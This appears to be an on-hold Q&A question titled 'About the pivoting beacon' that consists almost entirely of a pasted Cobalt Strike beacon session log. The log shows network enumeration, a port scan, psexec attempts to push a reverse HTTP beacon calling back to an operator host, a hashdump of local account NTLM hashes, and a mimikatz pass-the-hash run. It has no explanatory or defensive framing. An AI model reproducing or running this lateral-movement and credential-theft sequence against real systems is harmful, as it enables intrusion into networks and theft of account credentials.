About the pivoting beacon [on hold]

[+] established link to parent beacon: 192.168.1.2

beacon> net view
[*] Tasked beacon to run net view
[+] host called home, sent: 76344 bytes
[+] received output:
List of hosts:


[+] received output:
 Server Name             IP Address                       Platform  Version  Type   Comment
 -----------             ----------                       --------  -------  ----   -------
 HEMA1                   192.168.1.5                      500       6.1             
 HEMA2                   192.168.1.6                      500       6.1             
 HEMA3                   192.168.1.13                     500       6.1             
 HEMA5                   192.168.1.2                      500       6.1             
 WTP-PC                  192.168.1.12                     500       6.1             

beacon> portscan 192.168.1.12 1-1024,3389,5900-6000 none 1024
[*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on 192.168.1.12
[+] host called home, sent: 75325 bytes
[+] received output:
192.168.1.12:139
192.168.1.12:135

[+] received output:
192.168.1.12:554
192.168.1.12:445
Scanner module is complete

beacon> psexec WTP-PC ADMIN$ http
[*] Tasked beacon to run windows/beacon_http/reverse_http (192.168.1.3:6666) on WTP-PC via Service Control Manager (\\WTP-PC\ADMIN$\99981.exe)
[+] host called home, sent: 14985 bytes
[-] could not upload file: 5
[-] Could not open service control manager on WTP-PC: 5
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 64069 bytes
[+] received password hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
wtp:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

beacon> rev2self
[*] Tasked beacon to revert token
beacon> pth HEMA5\Administrator 31d6cfe0d16ae931b73c59d7e0c089c0
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:Administrator /domain:HEMA5 /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0 /run:"cmd.exe /c echo 1b932da7028 > \\.\pipe\ca907f" command
beacon> psexec WTP-PC ADMIN$ smb
[*] Tasked beacon to run windows/beacon_smb/bind_pipe (\\WTP-PC\pipe\status_7777) on WTP-PC via Service Control Manager (\\WTP-PC\ADMIN$\638e2.exe)
[+] host called home, sent: 679790 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[-] could not upload file: 1331
[-] Could not open service control manager on WTP-PC: 5
[-] Could not connect to pipe (\\WTP-PC\pipe\status_7777): 1331
[-] could not connect to pipe: 1331
[+] received output:
user    : Administrator
domain  : HEMA5
program : cmd.exe /c echo 1b932da7028 > \\.\pipe\ca907f
impers. : no
NTLM    : 31d6cfe0d16ae931b73c59d7e0c089c0
  |  PID  3184
  |  TID  2212
  |  LSA Process is now R/W
  |  LUID 0 ; 19179194 (00000000:0124a6ba)
  \_ msv1_0   - data copy @ 001C6B0C : OK !
  \_ kerberos - data copy @ 001A8628
   \_ aes256_hmac       -> null             
   \_ aes128_hmac       -> null             
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace -> null
    
asked by Capo Dark 24.12.2018 - 18:03

0 answers
